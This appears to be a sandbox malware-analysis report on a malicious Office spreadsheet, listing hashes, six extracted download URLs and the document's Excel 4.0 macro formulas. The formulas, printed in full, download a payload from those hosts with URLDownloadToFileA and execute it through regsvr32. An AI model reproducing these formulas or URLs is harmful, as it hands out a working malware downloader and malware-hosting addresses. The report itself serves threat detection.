General
-
Target
b0f61b945e9483206350f7264391d132ebbf6eff2746ebccfef6b75fde8bf1e5
-
Size
40KB
-
MD5
285d7d69a9a3ee17fff3fc0f2edf8306
-
SHA1
4055ed5ff6aae520473a0c42784ab54176753106
-
SHA256
b0f61b945e9483206350f7264391d132ebbf6eff2746ebccfef6b75fde8bf1e5
-
SHA512
19cdece718eabaaf03eefe4bec73285ed751d2fdd5e160f77bd6e25e73ccd848ed1a6fabd02d18ffa7817f032d877c11bf12e811065e9ebce3172d4ab1c585db
-
SSDEEP
768:a/omdH+DOevZCwttqyKfcrND59V+L9Rw4eWrXcTqZ0VP2HLp:2omdH+DoylND59V4jwmXc2CVCF
Malware Config
Extracted
http://vipteck.com/wp-content/M/
https://shofarshoshanna.com/t0ssm/roE/
https://santacruzam.com/wp-admin/FeDgNEP/
https://thearkrealmproject.com/wp-admin/wxB4Wp3KyEMCsZva/
https://kingspointresidence.com/camelia-diamond_/G/
https://rockadile.nl/blogs/36DlPQKwRR1vOFQR/
-
formulas
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://vipteck.com/wp-content/M/","..\aew.ocx",0,0) =IF('EFALGV'!D10<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://shofarshoshanna.com/t0ssm/roE/","..\aew.ocx",0,0)) =IF('EFALGV'!D12<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://santacruzam.com/wp-admin/FeDgNEP/","..\aew.ocx",0,0)) =IF('EFALGV'!D14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://thearkrealmproject.com/wp-admin/wxB4Wp3KyEMCsZva/","..\aew.ocx",0,0)) =IF('EFALGV'!D16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://kingspointresidence.com/camelia-diamond_/G/","..\aew.ocx",0,0)) =IF('EFALGV'!D18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://rockadile.nl/blogs/36DlPQKwRR1vOFQR/","..\aew.ocx",0,0)) =IF('EFALGV'!D20<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe /s ..\aew.ocx") =RETURN()
Signatures
-
Suspicious Office macro 1 IoCs
Office document equipped with 4.0 macros.
Files
-
b0f61b945e9483206350f7264391d132ebbf6eff2746ebccfef6b75fde8bf1e5